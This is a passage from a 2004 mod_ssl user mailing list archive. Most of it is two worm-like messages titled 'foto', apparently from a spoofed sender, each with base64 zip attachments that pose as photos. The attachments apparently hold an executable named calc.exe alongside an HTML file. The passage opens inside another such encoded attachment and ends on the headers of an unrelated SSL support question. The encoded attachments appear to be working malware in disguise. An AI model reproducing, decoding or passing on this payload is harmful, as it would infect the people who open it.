ki+64aKhj9RYVEWbXzC60pJhLKdXV2JYK4r8BKB2rbt/lI7Lt9wiE5ij8LBwuqsSu4idjtNA
PgTFzDJmjTv89o4WJdNhebbjwf+yR+Qbh9pD8AJbMlTx3CImXTIxzBjH4vJUnUn5BVrI8FWt
4O6T8d+lCwcuqI79WyzUiExMF9OUkS9sg7meo7Kc3OJ2S0YZV2rEO57jFhQ3q8l80+uqsHFz
a+viYU/oOmekLq64roT/HGuVc01cArpr6zmthgZB87ik+btHc/za06ibRZyhmzXUo6bKH5c2
RoewCOUmxmEJH92xqDJcQ4iFjV1QclXLd5i51W7jYg2ERh5XG3z5FYIpo1bVOadgiIo57lRz
xPL1DFcf4o6DjMsZfPVdy8OuM+ATRS0nJ233iKdgXV9lkTS0pmoiK172Fvy5EH9zTHduV0wE
qnYiKFIbPipNkE6G1c+MsEw6NcXM0bAE3pCeSwSvryEtfIQlg0MI9MVfzTCIe69fbv6PUlPw
9y23tXa1rm5rbbu3bU+b0pZvG2g/0/5QLBd7PPbl2Hdiz8SOx07HXo39JPYb8Vj8nnhnfChu
xO34WPwP4k/E/zg+Hf9K/FD8G/Fvxg/Hj8Sfic/En4ufif8o/lL81fhP46/H34r/PD4Xr9vU
sGn5ppWb1mx6rwd9I5UTwmYDIYR9dVmnd3b3DSR6k4PbdUReDiKswfAXgMFOz0a0Uf6BYLDX
C9+V9/bZSnHAVMmCl/8FD+q7grcH8YNBcqxc5L8YoBT8fNFLuRcY/qgh3ujDN/vtYNjF99pS
78f0P1BLAQIUABQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAAAAAAAEAIACAgQAAAABmb3Rv
Lmh0bVBLAQIUAAoAAAAAAIqyITEAAAAAAAAAAAAAAAACAAAAAAAAAAAAEgDAQXwAAAAxL1BL
AQIUABQAAAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAAAAAAAAAIgDAgZwAAAAxL2NhbGMuZXhl
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------zonjhzdvsyzkqriymnbn--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 16:19:25 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7B3DAA8A79; Wed,  1 Sep 2004 16:19:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sulsajukke.org (24-90-172-107.nj.rr.com [24.90.172.107])
	by master.modssl.org (Postfix) with SMTP id AA904A8995
	for ; Wed,  1 Sep 2004 16:19:20 +0200 (CEST)
Date: Wed, 01 Sep 2004 23:19:19 +0900
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------dninuyrjsiznejffrgfa"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------dninuyrjsiznejffrgfa
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------dninuyrjsiznejffrgfa
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------dninuyrjsiznejffrgfa--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 17:05:01 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E24EBA898B; Wed,  1 Sep 2004 17:05:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.org (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id 3933FA8963
	for ; Wed,  1 Sep 2004 17:04:57 +0200 (CEST)
Date: Wed, 01 Sep 2004 11:05:49 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gmoyyacyfvtvqannngok"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gmoyyacyfvtvqannngok
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------gmoyyacyfvtvqannngok
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------gmoyyacyfvtvqannngok--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep  2 18:20:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BCFA6A8A79; Thu,  2 Sep 2004 18:20:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from BIGZEPHRAM.BUR.CORP.UNX (mail.unx.com [65.118.89.131])
	by master.modssl.org (Postfix) with ESMTP id E61D1A8960
	for ; Thu,  2 Sep 2004 18:20:47 +0200 (CEST)
Received: from MAKBAR.BUR.CORP.UNX ([10.202.202.66]) by BIGZEPHRAM.BUR.CORP.UNX with Microsoft SMTPSVC(5.0.2195.5329);
	 Thu, 2 Sep 2004 09:20:45 -0700
X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: SSL not working with apache
Date: Thu, 2 Sep 2004 09:20:45 -0700
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL not working with apache
Thread-Index: AcSRCMz0LXCDs198Sla0sGwolNvUOg==
From: "Philip Lavine" 
To: 
